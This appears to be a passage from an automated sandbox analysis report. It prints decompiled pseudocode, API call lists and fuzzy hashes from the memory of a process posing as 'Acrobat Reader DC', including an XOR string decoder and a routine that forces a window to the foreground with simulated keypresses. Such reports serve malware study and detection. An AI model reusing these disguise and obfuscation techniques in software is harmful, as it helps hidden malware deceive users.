                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ExitProcess$AddressHandleModuleProc___crt
                                  • String ID:
                                  • API String ID: 2427264223-0
                                  • Opcode ID: 176e26db055b62aeaf9cf92000a80230bc536f1d50f5b4dae20e080cb65f91b1
                                  • Instruction ID: f47d9122093ed6489770cc06aed7b78ba16bb349dce56bb799ac8566cdeb1789
                                  • Opcode Fuzzy Hash: 176e26db055b62aeaf9cf92000a80230bc536f1d50f5b4dae20e080cb65f91b1
                                  • Instruction Fuzzy Hash: 56B09B310001487BCB052F16DD0D84D3F15DB413907544029F91905031DF779D919688
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 60%
                                  			E00402780(intOrPtr* __eax, void* __ecx, void* __edi) {
                                  				void* __esi;
                                  				intOrPtr _t40;
                                  				signed int _t41;
                                  				intOrPtr _t44;
                                  				intOrPtr* _t50;
                                  				signed int _t51;
                                  				signed short _t52;
                                  				signed int _t53;
                                  				intOrPtr* _t55;
                                  				signed int _t56;
                                  				intOrPtr* _t57;
                                  				intOrPtr* _t58;
                                  				intOrPtr* _t59;
                                  				void* _t77;
                                  				intOrPtr _t78;
                                  				signed int _t79;
                                  				intOrPtr* _t80;
                                  				void* _t83;
                                  
                                  				_t77 = __edi;
                                  				_t57 = __eax;
                                  				_t1 = _t77 + 0xc; // 0x43
                                  				_t40 =  *_t1;
                                  				_push(_t78);
                                  				_t86 =  *((intOrPtr*)(__edi + 8)) - _t40;
                                  				if( *((intOrPtr*)(__edi + 8)) == _t40) {
                                  					_t41 = _t40 + _t40;
                                  					 *(__edi + 0xc) = _t41;
                                  					__eflags = _t41 - 4;
                                  					if(__eflags < 0) {
                                  						_t79 = 4;
                                  					} else {
                                  						_t79 = _t41;
                                  					}
                                  					 *(_t77 + 0xc) = _t79;
                                  					_push( ~(0 | __eflags > 0x00000000) | _t79 * 0x00000004);
                                  					_t44 = E004115D7(_t77, _t79, __eflags);
                                  					_t33 = _t77 + 4; // 0x444ad7
                                  					_t78 = _t44;
                                  					_t34 = _t77 + 8; // 0x530041
                                  					E00410E60(_t78,  *_t33,  *_t34 +  *_t34 +  *_t34 +  *_t34);
                                  					_t35 = _t77 + 4; // 0x444ad7
                                  					_push( *_t35);
                                  					E004111DC();
                                  					_t83 = _t83 + 0x14;
                                  					 *((intOrPtr*)(_t77 + 4)) = _t78;
                                  				}
                                  				_push(0xc); // executed
                                  				_t50 = E004115D7(_t77, _t78, _t86); // executed
                                  				if(_t50 == 0) {
                                  					_t80 = 0;
                                  					goto L6;
                                  				} else {
                                  					_t80 = _t50;
                                  					_t52 =  *((intOrPtr*)(_t57 + 8));
                                  					 *(_t80 + 8) = _t52;
                                  					_t53 = _t52 & 0x0000ffff;
                                  					 *((short*)(_t80 + 0xa)) =  *((intOrPtr*)(_t57 + 0xa));
                                  					if(_t53 <= 0x3f) {
                                  						__eflags = _t53 - 0x30;
                                  						if(__eflags < 0) {
                                  							goto L3;
                                  						} else {
                                  							_push(0x10); // executed
                                  							_t55 = E004115D7(_t77, _t80, __eflags); // executed
                                  							__eflags = _t55;
                                  							if(_t55 == 0) {
                                  								_t55 = 0;
                                  							} else {
                                  								_t58 =  *_t57;
                                  								 *_t55 =  *_t58;
                                  								 *((intOrPtr*)(_t55 + 4)) =  *((intOrPtr*)(_t58 + 4));
                                  								 *((intOrPtr*)(_t55 + 8)) =  *((intOrPtr*)(_t58 + 8));
                                  								_t59 =  *((intOrPtr*)(_t58 + 0xc));
                                  								 *((intOrPtr*)(_t55 + 0xc)) = _t59;
                                  								 *_t59 =  *_t59 + 1;
                                  								__eflags =  *_t59;
                                  							}
                                  							 *_t80 = _t55;
                                  							_t19 = _t77 + 8; // 0x530041
                                  							_t56 =  *_t19;
                                  							_t20 = _t77 + 4; // 0x444ad7
                                  							 *((intOrPtr*)( *_t20 + _t56 * 4)) = _t80;
                                  							_t23 = _t77 + 8;
                                  							 *_t23 =  *(_t77 + 8) + 1;
                                  							__eflags =  *_t23;
                                  							return _t56;
                                  						}
                                  					} else {
                                  						L3:
                                  						if(_t53 == 0x10) {
                                  							 *_t80 =  *_t57;
                                  							 *((intOrPtr*)(_t80 + 4)) =  *((intOrPtr*)(_t57 + 4));
                                  						} else {
                                  							if(_t53 == 0x20) {
                                  								 *_t80 =  *_t57;
                                  							} else {
                                  								 *_t80 =  *_t57;
                                  							}
                                  						}
                                  						L6:
                                  						_t7 = _t77 + 8; // 0x530041
                                  						_t51 =  *_t7;
                                  						_t8 = _t77 + 4; // 0x444ad7
                                  						 *((intOrPtr*)( *_t8 + _t51 * 4)) = _t80;
                                  						 *(_t77 + 8) =  *(_t77 + 8) + 1;
                                  						return _t51;
                                  					}
                                  				}
                                  			}






















                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID:
                                  • API String ID: 4104443479-0
                                  • Opcode ID: 5787e8657e79955fb28a38bf335b6d7571070b1586e9a7fa06b155a48d50d078
                                  • Instruction ID: 412edbf2df7bf8c64f36b821a583ca4e96a0f18e0b9aed18a790d0e499aeb9a1
                                  • Opcode Fuzzy Hash: 5787e8657e79955fb28a38bf335b6d7571070b1586e9a7fa06b155a48d50d078
                                  • Instruction Fuzzy Hash: 60319CB9600A21EFC714DF19C580A62F7E0FF08310B14C57ADA89CB795E774E892CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E0040F760(signed int __ecx, intOrPtr* __edi, void* __eflags, intOrPtr _a4) {
                                  				char _v268;
                                  				char _v412;
                                  				char _v428;
                                  				void* __ebx;
                                  				void* __esi;
                                  				void* __ebp;
                                  				signed int _t29;
                                  				void* _t32;
                                  				intOrPtr _t34;
                                  				void* _t35;
                                  				void* _t36;
                                  				void* _t40;
                                  				intOrPtr _t42;
                                  				void* _t51;
                                  				signed int _t53;
                                  				signed int _t58;
                                  				signed int _t60;
                                  				void* _t62;
                                  				void* _t63;
                                  				void* _t66;
                                  				signed int _t67;
                                  				void* _t70;
                                  				void* _t71;
                                  				void* _t72;
                                  				void* _t75;
                                  
                                  				_t75 = __eflags;
                                  				_push(_t62);
                                  				_t63 = E0040F6F0(0x484ea8, __ecx | 0xffffffff, _t62);
                                  				E00413650( &_v268, _t63);
                                  				_push(_t63);
                                  				E004111DC();
                                  				_t70 = (_t67 & 0xfffffff8) - 0x1a8 + 0xc;
                                  				_t64 =  &_v412;
                                  				E0040F820( &_v412);
                                  				E0040F850( &_v268,  &_v412, _t75);
                                  				 *(__edi + 8) = 0;
                                  				_t51 = 0;
                                  				_t29 = 0;
                                  				do {
                                  					_t32 = _t29 + ( *(_t70 + _t51 + 0x18) & 0x000000ff) + ( *(_t70 + _t51 + 0x19) & 0x000000ff) + ( *(_t70 + _t51 + 0x1a) & 0x000000ff);
                                  					_t58 =  *(_t70 + _t51 + 0x1b) & 0x000000ff;
                                  					_t51 = _t51 + 4;
                                  					_t29 = _t32 + _t58;
                                  				} while (_t51 < 0x10);
                                  				 *(__edi + 8) = _t29;
                                  				_t34 = E004149C2(_a4, L"rb"); // executed
                                  				_t71 = _t70 + 8;
                                  				 *__edi = _t34;
                                  				if(_t34 == 0) {
                                  					_t35 = 1;
                                  				} else {
                                  					_t36 = E0040F5C0(__edi); // executed
                                  					_t79 = _t36;
                                  					if(_t36 == 0) {
                                  						E00414D04( &_v428, 1, 0x10,  *__edi);
                                  						_t72 = _t71 + 0x10;
                                  						E0044AFEF( &_v428, __eflags,  &_v428, 0x10, 0x99f2);
                                  						_t40 = 0;
                                  						 *(__edi + 8) = 0;
                                  						_t53 = 0;
                                  						__eflags = 0;
                                  						do {
                                  							_t60 =  *(_t72 + _t40 + 8) & 0x000000ff;
                                  							_t40 = _t40 + 1;
                                  							_t53 = _t53 * _t60;
                                  							__eflags = _t40 - 0x10;
                                  						} while (__eflags < 0);
                                  						_push( *__edi);
                                  						 *(__edi + 8) = _t53;
                                  						_t42 = E00414FE2(0, _t60, __edi, _t64, __eflags); // executed
                                  						 *((intOrPtr*)(__edi + 4)) = _t42;
                                  						_t35 = 0;
                                  					} else {
                                  						_push( *__edi);
                                  						_t66 = _t36;
                                  						E00414A46(0, _t58, __edi, _t66, _t79);
                                  						_t35 = _t66;
                                  					}
                                  				}
                                  				return _t35;
                                  			}





























                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memset$ByteCharMultiWide$_sprintf_strlen_wcslen
                                  • String ID:
                                  • API String ID: 3898977315-0
                                  • Opcode ID: bd970487722ed412f8effd1999deb2f338760f6f87b849b930bc41062b4911b2
                                  • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                  • Opcode Fuzzy Hash: bd970487722ed412f8effd1999deb2f338760f6f87b849b930bc41062b4911b2
                                  • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                  			E0046F3C1(void* __ecx, void* __fp0, struct HWND__* _a4, intOrPtr _a8) {
                                  				void* __edi;
                                  				void* __esi;
                                  				void* _t11;
                                  				void* _t13;
                                  				void* _t14;
                                  				void* _t17;
                                  				void* _t18;
                                  				void* _t25;
                                  				struct HWND__* _t26;
                                  				void* _t27;
                                  				struct HWND__* _t32;
                                  
                                  				_t27 = __ecx;
                                  				_t32 = _a4;
                                  				_t35 = _t32 + 0x2e0;
                                  				E004109E0(_t11, _t32 + 0x2e0);
                                  				_t25 = _t32 + 0x1b8;
                                  				_t13 = E004426BB(_t25);
                                  				_push(_t25);
                                  				if(_t13 == 0) {
                                  					_t14 = E00443833();
                                  					__eflags = _t14;
                                  					if(_t14 == 0) {
                                  						goto L3;
                                  					} else {
                                  						_t17 = E004533EB(_t25);
                                  						_t33 = _t32 + 0x1d8;
                                  						__eflags = _t32 + 0x1d8;
                                  						_t18 = E0046ED8E(_t32 + 0x1d8, __fp0, _t33, _t17, _t32 + 0x1c8, _t35,  *((intOrPtr*)(_t32 + 0x2d4)),  *(_t32 + 0x2dd) & 0x000000ff,  *(_t32 + 0x2dc) & 0x000000ff, _a8); // executed
                                  						return _t18;
                                  					}
                                  				} else {
                                  					_t26 = E0044B3AC();
                                  					_a4 = _t26;
                                  					if(IsWindow(_t26) == 0) {
                                  						L3:
                                  						__eflags = 0;
                                  						return 0;
                                  					} else {
                                  						E0044CDAF(_t27, _t32 + 0x1d8, _t32 + 0x1d8, _t26);
                                  						E00436299(_t35,  &_a4);
                                  						return 1;
                                  					}
                                  				}
                                  			}















                                  APIs
                                  • IsWindow.USER32(00000000), ref: 0046F3F1
                                    • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window_memmove
                                  • String ID:
                                  • API String ID: 517827167-0
                                  • Opcode ID: 9fbfc9f8aed1688e47d472757497f7b005165081132f4017b987863961a9c52e
                                  • Instruction ID: bb29974ae8a0ca66dd60d7796f545a3f68a626f1234de100ca197a45a268520a
                                  • Opcode Fuzzy Hash: 9fbfc9f8aed1688e47d472757497f7b005165081132f4017b987863961a9c52e
                                  • Instruction Fuzzy Hash: 5111CEB22001157AE200AAA6EC80DFBF75CEBD0365F04413BFD0892102DB39A95983B9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E0041F677(signed int _a4, signed int _a8, long _a12) {
                                  				void* _t10;
                                  				long _t11;
                                  				long _t12;
                                  				signed int _t13;
                                  				signed int _t17;
                                  				long _t19;
                                  				long _t24;
                                  
                                  				_t17 = _a4;
                                  				if(_t17 == 0) {
                                  					L3:
                                  					_t24 = _t17 * _a8;
                                  					__eflags = _t24;
                                  					if(_t24 == 0) {
                                  						_t24 = _t24 + 1;
                                  						__eflags = _t24;
                                  					}
                                  					goto L5;
                                  					L6:
                                  					_t10 = RtlAllocateHeap( *0x496e6c, 8, _t24); // executed
                                  					__eflags = 0;
                                  					if(0 == 0) {
                                  						goto L7;
                                  					}
                                  					L14:
                                  					return _t10;
                                  					goto L15;
                                  					L7:
                                  					__eflags =  *0x496e68;
                                  					if( *0x496e68 == 0) {
                                  						_t19 = _a12;
                                  						__eflags = _t19;
                                  						if(_t19 != 0) {
                                  							 *_t19 = 0xc;
                                  						}
                                  					} else {
                                  						_t11 = E00411988(_t24);
                                  						__eflags = _t11;
                                  						if(_t11 != 0) {
                                  							L5:
                                  							_t10 = 0;
                                  							__eflags = _t24 - 0xffffffe0;
                                  							if(_t24 > 0xffffffe0) {
                                  								goto L7;
                                  							} else {
                                  								goto L6;
                                  							}
                                  						} else {
                                  							_t12 = _a12;
                                  							__eflags = _t12;
                                  							if(_t12 != 0) {
                                  								 *_t12 = 0xc;
                                  							}
                                  							_t10 = 0;
                                  						}
                                  					}
                                  					goto L14;
                                  				} else {
                                  					_t13 = 0xffffffe0;
                                  					_t27 = _t13 / _t17 - _a8;
                                  					if(_t13 / _t17 >= _a8) {
                                  						goto L3;
                                  					} else {
                                  						 *((intOrPtr*)(E00417F77(_t27))) = 0xc;
                                  						return 0;
                                  					}
                                  				}
                                  				L15:
                                  			}











                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00416B5F,004115F6,?,00000000,00000000,00000000,?,00417A1B,00000001,00000214,?,004115F6), ref: 0041F6BA
                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AllocateHeap__getptd_noexit
                                  • String ID:
                                  • API String ID: 328603210-0
                                  • Opcode ID: b303a5dab890f8841b70c8dc9e02e5bbf0853f8a352e43766576194431ea4f93
                                  • Instruction ID: b12b70d0c6160b5ee631c5b95a8e6af17588d2488de0a25e1c35044c814a7025
                                  • Opcode Fuzzy Hash: b303a5dab890f8841b70c8dc9e02e5bbf0853f8a352e43766576194431ea4f93
                                  • Instruction Fuzzy Hash: FB01B1352002159BEB249F35DC14BEB3354AB91764F15453BE815CA2B0DB788C87C768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E00444AF8(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
                                  				void* __edi;
                                  				void* __esi;
                                  				void* _t23;
                                  				void* _t28;
                                  				signed int _t29;
                                  				void* _t31;
                                  				signed short _t41;
                                  				intOrPtr* _t42;
                                  
                                  				_t42 = _a8;
                                  				_t3 =  *_t42 + 4; // 0x4
                                  				_t41 =  *( *_t42 + _a4);
                                  				 *_t42 = _t3;
                                  				_t5 = _t41 + 1; // 0x485a85
                                  				_push( ~(0 | __eflags > 0x00000000) | _t5 * 0x00000002); // executed
                                  				_t23 = E004115D7(_t41, _t42, __eflags); // executed
                                  				_t31 = _t23;
                                  				E00410E60(_t31,  *_t42 + _a4, _t41 + _t41);
                                  				_t28 = _t41 + _t41;
                                  				 *_t42 =  *_t42 + _t28;
                                  				 *((short*)(_t28 + _t31)) = 0;
                                  				_t29 = 0;
                                  				if(_t41 > 0) {
                                  					do {
                                  						 *(_t31 + _t29 * 2) =  *(_t31 + _t29 * 2) ^ _t41;
                                  						_t29 = _t29 + 1;
                                  					} while (_t29 < _t41);
                                  				}
                                  				return _t31;
                                  			}












                                  APIs
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • _memmove.LIBCMT ref: 00444B34
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _malloc_memmove
                                  • String ID:
                                  • API String ID: 1183979061-0
                                  • Opcode ID: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                                  • Instruction ID: 1ab6fe9f530497837eb86deb75815884a9af672873ccf792f11a5e6f6739e6df
                                  • Opcode Fuzzy Hash: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                                  • Instruction Fuzzy Hash: E0016D3220410AAFD714DF2CC882DA7B3EDEF88318711492FE996C7251EA74F9508B94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 25%
                                  			E004118DA(intOrPtr _a4) {
                                  				void* __ebp;
                                  				void* _t2;
                                  				void* _t3;
                                  				void* _t4;
                                  				void* _t5;
                                  				void* _t6;
                                  				void* _t9;
                                  
                                  				_push(0);
                                  				_push(0);
                                  				_push(_a4);
                                  				_t2 = E0041179A(_t3, _t4, _t5, _t6, _t9); // executed
                                  				return _t2;
                                  			}











                                  APIs
                                  • _doexit.LIBCMT ref: 004118E6
                                    • Part of subcall function 0041179A: __lock.LIBCMT ref: 004117A8
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __lock_doexit
                                  • String ID:
                                  • API String ID: 368792745-0
                                  • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                  • Instruction ID: 5a17ee954bf67223b14f28cd02c2113b96eab5bc454a4982446cab3363f3b6fe
                                  • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                  • Instruction Fuzzy Hash: 0DB0923258020C33DA202652AC03F563A0A87C0B64F240021BA1C1D2E1A9A2A9A58089
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 25%
                                  			E004149C2(intOrPtr _a4, intOrPtr _a8) {
                                  				void* __ebp;
                                  				void* _t3;
                                  				void* _t4;
                                  				void* _t5;
                                  				void* _t6;
                                  				void* _t7;
                                  				void* _t10;
                                  
                                  				_push(0x40);
                                  				_push(_a8);
                                  				_push(_a4);
                                  				_t3 = E00414904(_t4, _t5, _t6, _t7, _t10); // executed
                                  				return _t3;
                                  			}











                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wfsopen
                                  • String ID:
                                  • API String ID: 197181222-0
                                  • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                  • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                  • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                  • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00434418(struct HWND__* _a4) {
                                  				long _v8;
                                  				int _v12;
                                  				struct HWND__* _t13;
                                  				DWORD* _t15;
                                  				long _t20;
                                  				int _t24;
                                  				long _t39;
                                  				struct HWND__* _t45;
                                  				long _t46;
                                  				struct HWND__* _t47;
                                  
                                  				_t13 = GetForegroundWindow();
                                  				_t45 = _a4;
                                  				_t47 = _t13;
                                  				if(_t45 != _t47) {
                                  					if(_t47 == 0) {
                                  						_t47 = FindWindowW(L"Shell_TrayWnd", _t47);
                                  					}
                                  					if(IsIconic(_t45) != 0) {
                                  						ShowWindow(_t45, 9);
                                  					}
                                  					_v12 = 0;
                                  					_t15 = SetForegroundWindow(_t45);
                                  					if(_t15 != 0) {
                                  						return 2;
                                  					} else {
                                  						_t46 = GetWindowThreadProcessId(_t47, _t15);
                                  						_t39 = GetCurrentThreadId();
                                  						_t20 = GetWindowThreadProcessId(_a4, 0);
                                  						_v8 = _t20;
                                  						AttachThreadInput(_t39, _t20, 1);
                                  						AttachThreadInput(_t39, _t46, 1);
                                  						AttachThreadInput(_t46, _v8, 1);
                                  						_t24 = SetForegroundWindow(_a4);
                                  						if(_t24 != 0) {
                                  							_v12 = 3;
                                  						} else {
                                  							keybd_event(0x12, MapVirtualKeyW(0x12, _t24), _t24, _t24);
                                  							keybd_event(0x12, MapVirtualKeyW(0x12, 0), 2, 0);
                                  							keybd_event(0x12, MapVirtualKeyW(0x12, 0), 0, 0);
                                  							keybd_event(0x12, MapVirtualKeyW(0x12, 0), 2, 0);
                                  							if(SetForegroundWindow(_a4) != 0) {
                                  								_v12 = 4;
                                  							}
                                  						}
                                  						AttachThreadInput(_t39, _v8, 0);
                                  						AttachThreadInput(_t39, _t46, 0);
                                  						AttachThreadInput(_t46, _v8, 0);
                                  						return _v12;
                                  					}
                                  				} else {
                                  					return 1;
                                  				}
                                  			}














                                  APIs
                                  • GetForegroundWindow.USER32 ref: 00434420
                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                  • IsIconic.USER32(?), ref: 0043444F
                                  • ShowWindow.USER32(?,00000009), ref: 0043445C
                                  • SetForegroundWindow.USER32(?), ref: 0043446A
                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                  • GetCurrentThreadId.KERNEL32 ref: 00434485
                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                  • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                  • keybd_event.USER32 ref: 004344CF
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                  • keybd_event.USER32 ref: 004344E6
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                  • keybd_event.USER32 ref: 004344FD
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                  • keybd_event.USER32 ref: 00434514
                                  • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                  • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
